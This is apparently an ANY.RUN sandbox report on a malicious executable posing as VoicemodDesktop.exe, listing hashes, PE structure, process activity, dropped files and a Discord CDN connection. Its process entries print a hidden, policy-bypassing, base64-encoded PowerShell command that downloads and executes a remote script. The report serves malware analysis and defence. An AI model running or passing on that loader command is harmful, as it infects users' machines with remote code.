analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

VoicemodDesktop.exe

Full analysis: https://app.any.run/tasks/4bc929a9-7e15-42d4-abfa-3b3875273a11
Verdict: Malicious activity
Analysis date: April 01, 2023, 02:16:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

450FF5CD853C1E41F6484351D7A42A54

SHA1:

A0D22F315449DF80CF8F8541D8A3CBF62B7E44D3

SHA256:

B61AD62CD86355CCB5B20F0090A6CA9293C084EA8D8EBB9349017997C2463F99

SSDEEP:

1536:2SpQqTdeFEoshF1CUUK99pGThfjATXuiJCWEMtOFKSEqaYojsWMgKOcdC/G:2OTYkxUCa2TXuiJCWttZqPnrPC/G

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3176)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3176)
    • Starts Visual C# compiler

      • powershell.exe (PID: 3176)
  • SUSPICIOUS

    • Reads the Internet Settings

      • powershell.exe (PID: 3176)
    • Starts CMD.EXE for commands execution

      • VoicemodDesktop.exe (PID: 2668)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 920)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 920)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 920)
    • Unusual connection from system programs

      • powershell.exe (PID: 3176)
    • Uses .NET C# to load dll

      • powershell.exe (PID: 3176)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3176)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 4060)
  • INFO

    • Create files in a temporary directory

      • powershell.exe (PID: 3176)
      • csc.exe (PID: 4060)
      • cvtres.exe (PID: 1400)
    • The process checks LSA protection

      • powershell.exe (PID: 3176)
      • cvtres.exe (PID: 1400)
      • csc.exe (PID: 4060)
    • Checks supported languages

      • VoicemodDesktop.exe (PID: 2668)
      • csc.exe (PID: 4060)
      • cvtres.exe (PID: 1400)
      • AppLaunch.exe (PID: 1364)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 3176)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3176)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 4060)
      • cvtres.exe (PID: 1400)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

Subsystem: Windows command line
SubsystemVersion: 6
ImageVersion: -
OSVersion: 6
EntryPoint: 0x275a
UninitializedDataSize: -
InitializedDataSize: 33792
CodeSize: 61440
LinkerVersion: 14.29
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, 32-bit
TimeStamp: 2023:03:30 10:51:41+00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date: 30-Mar-2023 10:51:41
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 4
Time date stamp: 30-Mar-2023 10:51:41
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0000EE19
0x0000F000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.59066
.rdata
0x00010000
0x00006C68
0x00006E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.01227
.data
0x00017000
0x000012F8
0x00000A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
2.03097
.rsrc
0x00019000
0x000001E0
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.71006

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.91161
381
UNKNOWN
English - United States
RT_MANIFEST

Imports

KERNEL32.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start voicemoddesktop.exe no specs cmd.exe no specs powershell.exe csc.exe cvtres.exe no specs applaunch.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2668"C:\Users\admin\AppData\Local\Temp\VoicemodDesktop.exe" C:\Users\admin\AppData\Local\Temp\VoicemodDesktop.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\voicemoddesktop.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\apphelp.dll
920C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADkAMAA5ADUAMAA5ADAANQAzADIAOAA4ADQANAA4ADkAMwAvADEAMAA5ADAAOQA1ADAAOQAzADAAMQA1ADQAOQAxADgAMAAwADgALwA0ADMANAAzADQAMwA0ADMANQA2AC4AcABzADEAJwApAA==C:\Windows\System32\cmd.exeVoicemodDesktop.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\winbrand.dll
3176C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADkAMAA5ADUAMAA5ADAANQAzADIAOAA4ADQANAA4ADkAMwAvADEAMAA5ADAAOQA1ADAAOQAzADAAMQA1ADQAOQAxADgAMAAwADgALwA0ADMANAAzADQAMwA0ADMANQA2AC4AcABzADEAJwApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
4060"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\emncbp0i.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.0.30319.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
1400C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES43EA.tmp" "c:\Users\admin\AppData\Local\Temp\CSC69EA31843CFE4BBDA2D279A510CF4C71.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
12.00.51209.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
1364"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET ClickOnce Launch Utility
Version:
4.0.30319.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
Total events
9 802
Read events
9 758
Write events
44
Delete events
0

Modification events

(PID) Process:(3176) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3176) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3176) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3176) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3176) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
2
Suspicious files
4
Text files
6
Unknown types
6

Dropped files

PID
Process
Filename
Type
4060csc.exeC:\Users\admin\AppData\Local\Temp\emncbp0i.outtext
MD5:1C7754F8EA1984E7B787491D64DA7E29
SHA256:596D1B84BDD5E922F82AD405A6A425F094C57549213029208E160A288F10FC42
4060csc.exeC:\Users\admin\AppData\Local\Temp\emncbp0i.dllexecutable
MD5:3528F7F59EC9D6C2FB7524683910D41A
SHA256:8B65F8F49E0FB41A9DA20FEAE2BEB14167ABFFD853BDF65DA2FD196881061393
4060csc.exeC:\Users\admin\AppData\Local\Temp\CSC69EA31843CFE4BBDA2D279A510CF4C71.TMPres
MD5:FD03E89B6E7BEEC90A89EE9936E169BD
SHA256:4E3F780FF684EA29272977C43FA017EBEB3DBA71FBF20D665758B6E5E8DF5049
1400cvtres.exeC:\Users\admin\AppData\Local\Temp\RES43EA.tmpo
MD5:A7D7CB6BF0FB8B7675E71F2A142E1378
SHA256:945798B43445B8D3631A84A60F2101F0E1F07369DC545BD73885D222C0CC9C42
3176powershell.exeC:\Users\admin\AppData\Local\Temp\emncbp0i.cmdlinetext
MD5:DA7735A4842E94621581B5D21A666D81
SHA256:B11DBAC3DED1CBAFA061DF6E89FF8F2262B167E99B9C0308A49FF0782AFA24C5
3176powershell.exeC:\Users\admin\AppData\Local\Temp\m5ewarqz.g0a.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3176powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3176powershell.exeC:\Users\admin\AppData\Local\Temp\sdvz0md4.aya.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3176powershell.exeC:\Users\admin\AppData\Local\Temp\emncbp0i.0.cstext
MD5:E8C41BF3708CC4BD505851F38966151A
SHA256:54DC97B3A24A8137D2B4DCB052B104FFDE93BD4A89297EE2FB522FA346BB01E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3176
powershell.exe
162.159.130.233:443
cdn.discordapp.com
CLOUDFLARENET
shared

DNS requests

Domain
IP
Reputation
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.135.233
  • 162.159.133.233
  • 162.159.134.233
  • 162.159.129.233
shared

Threats

PID
Process
Class
Message
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
3176
powershell.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
No debug info